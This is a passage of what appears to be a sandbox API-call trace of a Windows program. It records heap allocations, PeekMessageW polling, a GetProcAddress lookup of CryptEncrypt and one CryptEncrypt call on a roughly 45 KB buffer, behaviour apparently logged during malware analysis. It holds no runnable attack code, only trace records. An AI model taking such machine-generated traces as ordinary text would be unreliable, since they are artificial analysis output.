pdwDataLen=0x8cef60*=0xb0d0) returned 1 [0234.006] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0234.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.007] CharLowerBuffW (in: lpsz="byte[45264]", cchLength=0xb | out: lpsz="byte[45264]") returned 0xb [0234.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.011] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0234.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0234.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0234.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0234.012] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0234.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0234.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0234.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0234.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0234.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0234.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0234.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0234.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0234.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0234.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0234.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0234.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0234.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0234.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0234.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0234.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0234.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0234.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0234.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0234.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0234.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0234.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0234.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0234.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0234.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0234.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0234.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0234.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0234.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0234.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0234.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0234.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0234.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0234.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0234.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0234.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0234.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0234.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0234.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0234.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0234.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0234.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0234.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0234.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0234.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0ca) returned 0x2f40b78 [0234.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f40b78 | out: hHeap=0x970000) returned 1 [0234.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0234.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0234.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0234.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0234.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0234.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0234.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x978490 [0234.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0234.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0234.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0234.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0234.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0234.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0234.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0234.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0234.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0234.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0234.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0234.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0234.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0234.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0234.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0234.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0234.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0234.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0234.017] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0234.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0234.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0234.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0234.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0234.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0234.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0234.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0234.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0234.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0234.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0234.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0234.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0234.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0234.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0234.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0234.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0234.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0234.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0234.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0234.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0234.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0234.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0234.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0234.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0234.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0234.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0234.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0234.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0234.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0234.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0234.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0234.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0234.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0234.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0234.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0234.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0234.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0234.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0234.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0234.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0234.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0234.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0234.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0234.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0234.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0234.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0234.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0234.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0234.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0234.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0234.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0234.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0234.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0234.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0234.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0234.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0234.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0234.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0234.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0234.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0234.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0234.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0234.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0234.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0234.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0234.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0234.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0234.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0234.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0234.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0234.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0234.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e512c8 [0234.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e512c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0234.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0234.069] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0234.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0234.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0234.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f468 [0234.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0234.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0234.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0234.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0234.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0234.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0234.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0234.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0234.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0234.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0234.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0234.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0234.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0234.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0234.070] CryptEncrypt (in: hKey=0xa86f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f35aa0*, pdwDataLen=0x8cef60*=0xb0ca, dwBufLen=0xb0d0 | out: pbData=0x2f35aa0*, pdwDataLen=0x8cef60*=0xb0d0) returned 1 [0234.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0234.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0234.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0234.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0234.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0234.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0234.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0234.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0234.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0234.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0234.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0234.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0234.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0234.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0234.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0234.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0234.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0234.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0234.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0234.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0234.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0234.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0234.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0234.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0234.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0234.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0234.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0234.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0234.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0234.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 